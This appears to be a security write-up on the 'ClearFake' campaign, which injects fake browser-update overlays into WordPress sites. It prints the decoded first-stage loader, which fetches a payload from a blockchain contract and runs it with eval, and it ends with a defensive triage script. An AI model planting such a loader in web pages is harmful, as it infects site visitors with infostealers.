Over the past couple of months, a new wave of malware propagation through deceptive "fake-update" campaigns has emerged. This malicious tactic involves defacing websites with highly convincing overlays that demand a web browser update before granting access to the site. To the unsuspecting user, this seems like a routine update; however, in reality, these fraudulent "updates" conceal insidious infostealer malware variants such as RedLine, Amadey, or Lumma.
This specific campaign, dubbed "ClearFake" and discovered by cybersecurity expert Randy McEoin, initiates its assault on compromised WordPress websites. The attackers begin by embedding a concealed JavaScript code, acting as the initial "bridgehead." This code is injected into article pages, serving as a conduit to fetch a second-stage payload from a server controlled by malicious actors. This second-stage payload carries out the remainder of the site defacement.
The significance of this approach lies in its capacity to allow the attacker to remotely and instantaneously modify the infection process, enabling them to display any message of their choosing. This adaptability permits them to alter tactics, update blocked domains, and replace detected payloads without needing to revisit the compromised WordPress sites.
In the case of the "ClearFake" campaign, the second-stage code found its host on Cloudflare Workers. This was an effective strategy until Cloudflare took action to block these accounts, potentially disrupting the entire campaign.
However, the latest iteration of "ClearFake" introduces a new way to host the second-stage code anonymously and without a hosting provider that can pull the plug: "bulletproof" hosting on a public blockchain, where the payload is stored in a smart contract that only the attacker can update.
Which Blockchain Facility do they use?
For this they use a public blockchain. The obvious questions are why a blockchain at all, and which of the many blockchain services is involved. Let's start with the background.
The recent evolution in the infection process appears deceptively similar to its predecessor, using identical domains and IP addresses. However, upon closer examination, we uncover new, unfamiliar network traffic directed towards servers under the control of Binance, one of the world's largest cryptocurrency exchanges. This raises the question of what connection Binance has with this situation. To understand further, let's dissect the modified variant of the initial stage code:
```html
<script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>
<script src="data:text/javascript;base64,YXN5bmMgZnVuY3Rpb24gbG9hZCgpe2xldCBwcm92aWRlc
LnByb3ZpZGVycy5Kc29uUnBjUHJvdmlkZXIoImh0dHBzOi8vYnNjLWRhdGFzZWVkMS5iaW5hbmNlLm9yZy8iKSxzaWduZXI9cHJvd
*********b2FkOw==">
</script>
```
These two script tags are the first stage of the infection chain on a compromised WordPress site. Attackers insert them into the site's main theme template after gaining access through a vulnerable plugin (the route used by mass-injection campaigns such as Balada Injector), an outdated WordPress core, or stolen site credentials bought on the dark web. Note that the first tag loads the legitimate ethers.js library from its official CDN; only the second, base64-encoded inline script is malicious, so a scanner that only looks for suspicious external domains will miss it.
The encoded script decodes to essentially the following, which runs on every page served by the compromised site:
```javascript
// include https://cdn.ethers.io/lib/ethers-5.2.umd.min.js
async function load() {
  let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
    signer = provider.getSigner(),
    address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
    ABI = [
      { inputs: [{ internalType: "string", ....... },
      { inputs: [], name: "get", ...... },
      { inputs: [], name: "link", ....... },
    ],
    contract = new ethers.Contract(address, ABI, provider),
    link = await contract.get();
  eval(atob(link));
}
window.onload = load;
```
This code talks to the Binance Smart Chain (BSC) through a public JSON-RPC endpoint operated by Binance. It creates a contract instance bound to an attacker-controlled contract address and an ABI (Application Binary Interface) that declares the contract's functions, then calls the contract's read-only "get()" function, which returns whatever string the attacker last stored in the contract. That string is base64-decoded and executed as JavaScript with "eval()". Two things follow from this design. First, the attacker swaps payloads by sending a transaction that updates the contract's stored value, without touching any of the compromised sites. Second, blocking bsc-dataseed1.binance.org alone buys little, because the same contract state is served by every BSC RPC node and the loader only needs to point at a different one.
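The following is an added example, not code from the original post or from the ClearFake campaign: an offline triage script an analyst could run over a suspect page. It pulls base64 inline loaders out of the HTML, flags the ethers-plus-eval(atob()) pattern and extracts the RPC URL and contract address, shows the JSON-RPC eth_call that contract.get() becomes on the wire, and ABI-decodes a captured reply into the second-stage payload without ever executing it. The sample HTML, loader and contract reply are constructed here, not captured from a real site (the RPC URL and contract address are the ones quoted above); the 0x6d4ce63c selector is the first four bytes of keccak256("get()").

```javascript
"use strict";

// First 4 bytes of keccak256("get()"), the function selector ethers sends for get().
const SELECTOR_GET = "0x6d4ce63c";

// 1. Find <script src="data:text/javascript;base64,..."> tags and decode them.
function extractInlineLoaders(html) {
  const re = /<script[^>]*\ssrc=["']data:(?:text|application)\/javascript;base64,([A-Za-z0-9+\/=\s]+)["']/gi;
  const loaders = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    loaders.push(Buffer.from(m[1].replace(/\s+/g, ""), "base64").toString("utf8"));
  }
  return loaders;
}

// 2. Static indicators: an RPC provider plus eval(atob(...)) in a page script is
//    the shape of the loader above; a benign inline script should hit neither.
function triageLoader(js) {
  const usesRpc = /ethers\.(?:providers\.JsonRpcProvider|Contract)\b/.test(js);
  const evalsAtob = /\beval\s*\(\s*atob\s*\(/.test(js);
  const rpc = js.match(/JsonRpcProvider\(\s*["']([^"']+)["']/);
  const addr = js.match(/0x[0-9a-fA-F]{40}\b/);
  return {
    suspicious: usesRpc && evalsAtob,
    rpcUrl: rpc ? rpc[1] : null,
    contract: addr ? addr[0] : null,
  };
}

// 3. The JSON-RPC request contract.get() produces: a read-only eth_call whose
//    calldata is just the selector, which is why no signer, key or gas is needed.
function buildEthCall(contract) {
  return {
    jsonrpc: "2.0",
    id: 1,
    method: "eth_call",
    params: [{ to: contract, data: SELECTOR_GET }, "latest"],
  };
}

// 4. ABI-decode a single `string` return value from an eth_call result:
//    word 0 = byte offset of the string, word at that offset = length, then the bytes.
function abiDecodeString(hexResult) {
  const buf = Buffer.from(hexResult.replace(/^0x/, ""), "hex");
  const word = (i) => Number(BigInt("0x" + buf.subarray(i, i + 32).toString("hex")));
  const offset = word(0);
  const length = word(offset);
  return buf.subarray(offset + 32, offset + 32 + length).toString("utf8");
}

// Mirror of abiDecodeString, used only to construct the sample reply below.
function abiEncodeString(s) {
  const data = Buffer.from(s, "utf8");
  const word = (n) => Buffer.from(BigInt(n).toString(16).padStart(64, "0"), "hex");
  const padded = Buffer.concat([data, Buffer.alloc((32 - (data.length % 32)) % 32)]);
  return "0x" + Buffer.concat([word(32), word(data.length), padded]).toString("hex");
}

// The loader does eval(atob(link)); we do only the atob step and return text.
function recoverPayload(hexResult) {
  return Buffer.from(abiDecodeString(hexResult), "base64").toString("utf8");
}

// ---- Constructed sample input (not captured from a real site) ----
const SAMPLE_LOADER = `async function load(){let provider=new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),signer=provider.getSigner(),address="0x7f36D9292e7c70A204faCC2d255475A861487c60",contract=new ethers.Contract(address,[],provider),link=await contract.get();eval(atob(link));}window.onload=load;`;
const SAMPLE_HTML =
  `<html><head><script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js"></script>` +
  `<script src="data:text/javascript;base64,${Buffer.from(SAMPLE_LOADER).toString("base64")}"></script>` +
  `</head><body><p>article</p></body></html>`;
// Stand-in second stage, base64-encoded the way the contract would store it.
const SAMPLE_STAGE2 = 'console.log("stage2 placeholder");';
const SAMPLE_REPLY = abiEncodeString(Buffer.from(SAMPLE_STAGE2).toString("base64"));

function runTriage() {
  const [loader] = extractInlineLoaders(SAMPLE_HTML);
  const verdict = triageLoader(loader);
  return { verdict, request: buildEthCall(verdict.contract), payload: recoverPayload(SAMPLE_REPLY) };
}

if (typeof module !== "undefined" && require.main === module) {
  console.log(JSON.stringify(runTriage(), null, 2));
}
```

Run it with `node triage.js`. In a real case you would replace SAMPLE_HTML with the saved page source and SAMPLE_REPLY with the `result` field of the eth_call response captured from the proxy or pcap; the decoder never executes anything, so the recovered second stage can be handed to a sandbox or written to disk as evidence.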